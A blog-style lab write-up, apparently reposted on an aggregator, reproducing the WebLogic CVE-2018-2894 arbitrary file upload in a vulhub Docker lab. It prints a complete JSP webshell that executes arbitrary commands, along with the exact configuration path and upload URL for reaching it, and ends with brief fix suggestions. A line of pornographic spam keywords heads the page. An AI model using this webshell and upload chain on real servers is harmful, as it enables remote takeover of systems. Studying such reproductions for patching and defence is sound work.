国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

目錄

weblogic?

漏洞環(huán)境準(zhǔn)備

漏洞復(fù)現(xiàn)

修復(fù)建議


weblogic?

WebLogic美國(guó)Oracle公司出品的一個(gè)application server,確切的說(shuō)是一個(gè)基于JAVAEE架構(gòu)的中間件WebLogic是用于開(kāi)發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用數(shù)據(jù)庫(kù)應(yīng)用Java應(yīng)用服務(wù)器。將Java的動(dòng)態(tài)功能和Java Enterprise標(biāo)準(zhǔn)的安全性引入大型網(wǎng)絡(luò)應(yīng)用的開(kāi)發(fā)、集成、部署和管理之中。

CVE-2018-2894?該漏洞屬于一個(gè)遠(yuǎn)程上傳漏洞,通過(guò)更改Work Home工作目錄,用有效的已部署的Web應(yīng)用目錄替換默認(rèn)的存儲(chǔ)JKS Keystores文件的目錄,之后使用"添加Keystore設(shè)置"的功能,可上傳惡意的JSP腳本文件,造成攻擊。兩個(gè)頁(yè)面分別為/ws_utc/begin.do,/ws_utc/config.do

受影響的版本weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2weblogic 12.2.1.3。

漏洞環(huán)境準(zhǔn)備

下載好vulhub

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

?進(jìn)入目錄啟動(dòng) weblogic 12.2.1.3

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

docker-compose up -d

查看端口情況

docker-compose  ps

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

執(zhí)行docker-compose logs | grep password可查看管理員密碼

管理員用戶名為weblogic

密碼為B6eYMuo9

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

環(huán)境啟動(dòng)后,訪問(wèn)http://your-ip:7001/console,即可看到后臺(tái)登錄頁(yè)面。使用剛剛獲得的賬號(hào)密碼登錄

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

登錄后臺(tái)頁(yè)面,點(diǎn)擊base_domain的配置,在高級(jí)中開(kāi)啟啟用 Web 服務(wù)測(cè)試頁(yè)選項(xiàng):記得保存設(shè)置!!!要不然利用不到webshell

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

?Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

接下來(lái)訪問(wèn)http://your-ip:7001/ws_utc/config.do,設(shè)置Work Home Dir/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css。我將目錄設(shè)置為ws_utc應(yīng)用的靜態(tài)文件css目錄,訪問(wèn)這個(gè)目錄是無(wú)需權(quán)限的,這一點(diǎn)很重要。

漏洞復(fù)現(xiàn)

寫(xiě)一個(gè)jsp文件上傳

這里我們上傳一個(gè)可以利用的webshell ?

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

??? out.println("Command: " + request.getParameter("cmd") + "<BR>");

??? Process p;

??? if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){

??????? p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));

??? }

?else{

??????? p = Runtime.getRuntime().exec(request.getParameter("cmd"));

??? }

??? OutputStream os = p.getOutputStream();

??? InputStream in = p.getInputStream();

??? DataInputStream dis = new DataInputStream(in);

??? String disr = dis.readLine();

??? while ( disr != null ) {

??? out.println(disr);

??? disr = dis.readLine();

??? }

}

%>

</pre>

</BODY></HTML>

通過(guò)抓包我們可以發(fā)現(xiàn)返回了時(shí)間戳(我上傳了兩個(gè)jsp返回兩個(gè)時(shí)間戳)

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

然后訪問(wèn)

http://your-ip:7001/ws_utc/css/config/keystore/[時(shí)間戳]_[文件名]

即可執(zhí)行webshell

例如返回時(shí)間戳為1673447062823? 上傳jsp文件名為? 4.jsp

訪問(wèn)

http://192.168.10.142:7001/ws_utc/css/config/keystore/1673447062823_4.jsp

Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)

實(shí)驗(yàn)完成后記得關(guān)閉weblogic文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-428221.html

docker-compose? down

修復(fù)建議

  1. 升級(jí)到官方的最新版本;
  2. config.do,begin.do頁(yè)面強(qiáng)制登錄后才授權(quán)后訪問(wèn)

到了這里,關(guān)于Weblogic 任意文件上傳漏洞(CVE-2018-2894)復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【vulhub漏洞復(fù)現(xiàn)】CVE-2016-3088 ActiveMQ任意文件寫(xiě)入漏洞

    【vulhub漏洞復(fù)現(xiàn)】CVE-2016-3088 ActiveMQ任意文件寫(xiě)入漏洞

    影響版本:Apache ActiveMQ 5.x~5.14.0 漏洞原理:ActiveMQ中存儲(chǔ)文件的fileserver接口支持寫(xiě)入文件,但是沒(méi)有執(zhí)行權(quán)限。可以通過(guò)MOVE文件至其他可執(zhí)行目錄下,從而實(shí)現(xiàn)文件寫(xiě)入并訪問(wèn)。 ActiveMQ在5.12.x~5.13.x版本中,默認(rèn)關(guān)閉了fileserver這個(gè)應(yīng)用(但是可以在conf/jetty.xml中開(kāi)啟);在5

    2024年02月12日
    瀏覽(27)
  • 【漏洞復(fù)現(xiàn)】Weblogic CVE-2023-21839

    【漏洞復(fù)現(xiàn)】Weblogic CVE-2023-21839

    1. 產(chǎn)品簡(jiǎn)介 WebLogic是Oracle公司研發(fā)的用于開(kāi)發(fā)、集成、部署和管理大型分布式Web應(yīng)用、網(wǎng)絡(luò)應(yīng)用和數(shù)據(jù)庫(kù)應(yīng)用的Java應(yīng)用服務(wù)器,在全球范圍內(nèi)被廣泛使用。 2. 漏洞簡(jiǎn)介 Oracle發(fā)布安全公告,修復(fù)了一個(gè)存在于WebLogic Core中的遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2023-21839),可在未經(jīng)身份驗(yàn)證

    2023年04月16日
    瀏覽(23)
  • 【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)

    1. 漏洞簡(jiǎn)介 Ruby on Rails使用了指定參數(shù)的render file來(lái)渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來(lái)確定文件具體位置。我們可以通過(guò)修改訪問(wèn)某控制器的請(qǐng)求包,通過(guò)…/…/…/…/來(lái)達(dá)到路徑穿越的目的,然后再通過(guò){{來(lái)閉合模板查詢路徑,那我們?cè)L問(wèn)的文件會(huì)被當(dāng)做外部

    2024年02月04日
    瀏覽(31)
  • ActiveMQ 任意文件上傳漏洞復(fù)現(xiàn)

    ActiveMQ 任意文件上傳漏洞復(fù)現(xiàn)

    ? 訪問(wèn) http://ip:8161/admin/ 進(jìn)入admin登陸頁(yè)面,使用弱口令登陸,賬號(hào)密碼皆為 admin,登陸成功后,headers中會(huì)出現(xiàn)驗(yàn)證信息 ? 如:? Authorization: Basic YWRtaW46YWRtaW4= ? 訪問(wèn)任意頁(yè)面并抓包,注意headers中的驗(yàn)證信息 ? 將GET協(xié)議修改為PUT協(xié)議,將文件上傳至 fileserver 目錄下 ? 如上

    2024年04月16日
    瀏覽(20)
  • 春秋云鏡:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上傳漏洞)

    春秋云鏡:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上傳漏洞)

    ? 靶標(biāo)介紹: Subrion CMS 4.2.1 存在文件上傳漏洞 進(jìn)入題目: admin/admin? ??點(diǎn)擊設(shè)置: ?后臺(tái)管理主頁(yè): ?上傳頁(yè)面: 上傳目錄: /panel/uploads/ ??查看上傳位置: ?上傳位置: ?uploads/system.pht ?flag{24505f02-d430-4d3b-905e-17349e09c34c}

    2024年02月11日
    瀏覽(15)
  • 致遠(yuǎn)OA wpsAssistServlet 任意文件上傳漏洞 漏洞復(fù)現(xiàn)

    致遠(yuǎn)OA wpsAssistServlet 任意文件上傳漏洞 漏洞復(fù)現(xiàn)

    致遠(yuǎn)OA是一套辦公協(xié)同管理軟件。致遠(yuǎn)OA wpsAssistServlet接口存在任意文件上傳漏洞,攻擊者通過(guò)漏洞可以發(fā)送特定的請(qǐng)求包上傳惡意文件,獲取服務(wù)器權(quán)限。 致遠(yuǎn)OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致遠(yuǎn)OA G6、G6N (V8.1、V8.1SP1) 1、調(diào)用文件上傳接口上傳測(cè)試文件,請(qǐng)求包如下: 2、

    2024年02月11日
    瀏覽(24)
  • 【漏洞復(fù)現(xiàn)】Apache_Tomcat_PUT方法任意寫(xiě)文件(CVE-2017-12615)

    【漏洞復(fù)現(xiàn)】Apache_Tomcat_PUT方法任意寫(xiě)文件(CVE-2017-12615)

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說(shuō)明 內(nèi)容 漏洞編號(hào) CVE-2017-12615 漏洞名稱 Tomcat_PUT方法任意寫(xiě)文件 漏洞評(píng)級(jí) 高危 影響范圍 Tomcat版本:8.5.19 漏洞描述 漏洞本質(zhì)Tomcat配置了可寫(xiě)(readonly=false),導(dǎo)致我們可以往服務(wù)器寫(xiě)文件 修復(fù)方案

    2024年02月05日
    瀏覽(23)
  • 藍(lán)凌OA sysUiComponent 任意文件上傳漏洞復(fù)現(xiàn)

    藍(lán)凌OA sysUiComponent 任意文件上傳漏洞復(fù)現(xiàn)

    ? ? ?藍(lán)凌核心產(chǎn)品EKP平臺(tái)定位為新一代數(shù)字化生態(tài)OA平臺(tái),數(shù)字化向縱深發(fā)展,正加速構(gòu)建產(chǎn)業(yè)互聯(lián)網(wǎng),對(duì)企業(yè)協(xié)作能力提出更高要求,藍(lán)凌新一代生態(tài)型OA平臺(tái)能夠支撐辦公數(shù)字化、管理智能化、應(yīng)用平臺(tái)化、組織生態(tài)化,賦能大中型組織更高效的內(nèi)外協(xié)作與管理,支撐商

    2024年02月05日
    瀏覽(55)
  • 中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-Weblogic安全 2、中間件-JBoos安全 3、中間件-Jenkins安全 4、中間件-GlassFish安全 常見(jiàn)中間件的安全測(cè)試: 1、配置

    2024年02月08日
    瀏覽(19)
  • Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    Weblogic反序列化(CVE-2023-21839)漏洞復(fù)現(xiàn)

    序列化(Serialization):將對(duì)象的狀態(tài)信息轉(zhuǎn)換為可以存儲(chǔ)或傳輸?shù)男问降倪^(guò)程,一般將對(duì)象轉(zhuǎn)換為字節(jié)流。序列化時(shí),對(duì)象的當(dāng)前狀態(tài)被寫(xiě)入到臨時(shí)或持久性存儲(chǔ)區(qū)(文件、內(nèi)存、數(shù)據(jù)庫(kù)等)。 反序列化(Deserialization):從序列化的表示形式中提取數(shù)據(jù),即把有序字節(jié)流恢

    2024年02月07日
    瀏覽(29)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包